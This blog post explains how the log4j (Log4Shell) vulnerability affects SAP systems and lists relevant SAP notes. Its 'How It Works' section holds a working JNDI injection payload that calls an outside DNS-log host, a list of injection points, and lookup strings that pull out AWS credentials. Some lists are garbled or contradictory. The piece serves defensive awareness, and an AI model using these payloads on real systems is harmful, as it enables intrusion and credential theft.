What is the Impact of log4j vulnerability on SAP Systems?

You are curious whether your log4j vulnerability on SAP Systems is affected by the zero-day security vulnerability in the log4j library? For those non-cyber security folks wondering what the Log4j vulnerability is, which is possibly the biggest, most dangerous security vulnerability discovered in years (perhaps the most critical after HeartBleed), here it is in a somewhat simple, maybe over simple, way. Log4j is a logging capability in Java, and Java still powers a vast majority of enterprise software, which means Log4j is pretty much everywhere.

Is the log4j used for SAP systems?

Yes, log4j is an apache library used commonly in java applications. This particular issue was identified in log4j2 and fixed in log4j 2.17.0. See more in the document: Apache Log4j Security Vulnerabilities.

What is environment effected?

  1. SAP NetWeaver Application Server Java all versions
  2. Library versions Log4j 2.x (below than 2.17.0are affected
  3. Library versions Log4j 1.x has not been checked (see Apache Log4j Security Vulnerabilities for more details), although update of the library is recommended; this version is not supported/maintained since 2015. 

What are the Java Core componets impacted?

SAP NetWeaver Application Server Java is not impacted by the CVE-2021-44228, CVE-2021-45046 & CVE-2021-45105. This applies to all the AS Java Core Components (Check SAP Note# 1794179)

How to fix it?

Check the below SAP notes:
3129883 – CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 – AS Java Core Components’ impact for Log4j vulnerability.

3129934 – Log4j vulnerabilities – no impact for SAP Data Services, SAP Cloud Integration for Data Services.

3129897 – CVE-2021-44228 – Log4j vulnerability – no impact on SAP Adaptive Server Enterprise (ASE)

3130846 – Detecting and remediating log4j CVE-2021-44228 vulnerabilities in SAP Cloud Integration NEO and CF applications

3131007 – CVE-2021-44228 – Log4j vulnerability – no impact on SAP Information Steward

3131671 – (CVE-2021-44228) Impact of log4j vulnerability to CA Wily Introscope EM Server – Solution Manager – Focused Run

3130900 – (CVE-2021-44228) Impact of log4j vulnerability to CA Wily Introscope EM Server – Solution Manager – Focused Run(You can also check the new SAP Solution Manager Tcodes)

3129883 – CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 – AS Java Core Components’ impact for Log4j vulnerability

SAP Developer News on log4j vulnerability

How It Works?

Note: Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged

Specially crafted payload is injected into Headers, Input Fields or Query/Body params
https://target.com/?test=${jndi: ldap://jv-${sys:java.version}-hn-${hostName} .qwe3er.dnslog.cn/exp}

  1. Use service like dnslog.cn and create your DNS subdomain. Example: qwe3er.dnslog.cn
  2. Use this subdomain to craft payload and send it with request. Check request to DNS service for confirmation
  3. You should receive similar request (with Host & Java Version): jv-11.0.13-hn-73a957d15746.qwe3er.dnslog.cn

Test Environments

You can use test environments to inspect the behavior of this vulnerability
https://github.com/leonjza/log4jpwn
https://github.com/christophetd/log4shell-vulnerable-app
Challenges & Labs (Rooms)
You can use created challenges, labs (rooms) to practice this vulnerability
https://pentesterlab.com/exercises/log4j_rce/course
https://tryhackme.com/room/solar

How To Identify (Services You can use this websites to create DNS address (token) for your payload?

https://canarytokens.org
Token Type: Log4Shell
https://dnslog.cn
https://app.interactsh.com
How To Identify (Scanners) You can use this scanner to check if the target website is vulnerable
https://github.com/fullhunt/log4j-scan
https://github.com/adilsoybali/Log4j-RCE-Scanner

What Information can be Extracted?

List of places where Payload can be Injected

E
mail header,
Username,
Password,
E-mail address,
Filename,
Query/Body,
File content,
Document/Image EXIF, or inside of any of these Headers:
Authorization Originating-Ip X-Remote-Addr
Cache-Control Referer
X-Remote-Ip
Cf-Connecting_ip True-Client-Ip X-Wap-Profile
Client-Ip
User-Agent Authorization: Basic
Contact
X-Api-Version Authorization: Bearer
Cookie
X-Client-Ip Authorization: Oauth
Forwarded-for-Ip X-Forwarded-For Authorization: Token
Forwarded-For
X-Leakix
Forwarded
X-Originating-Ip
If-Modified-Since X-Real-Ip
${hostName}
${sys:os.name}
${sys:user.name} ${sys:os.arch}
${sys:user.home} ${sys:os.version)
${sys:user.dir} ${env:JAVA_VERSION)
${sys:java.home} ${env:AWS_SECRET_ACCESS_KEY}
${sys:java.vendor) ${env: AWS_SESSION_TOKEN)
${sys:java.version) ${env:AWS_SHARED_CREDENTIALS_FILE)
${sys:java.vendor.url} ${env:AWS_WEB_IDENTITY_TOKEN_FILE)
${sys:java.vm.version} ${env: AWS_PROFILE)
${sys:java.vm.vendor} ${eny:AWS_CONFIG_FILE}
${sys:java.vm.name} ${eny:AWS_ACCESS_KEY_ID)

Takeaways

  • Handle open source code with extreme skepticism.
  • Expand the aperture of hunt and incident response activities to take into account exploit attempts that may have occurred in the prehistory of the vulnerability.
  • Build antifragile defenses in depth such that even a critical remote code execution vulnerability like this is just one of many moves an opponent must make in a much grander game of chess
Avatar of Editor
We will be happy to hear your thoughts

Leave a reply

Price Comparison
Logo
Reset Password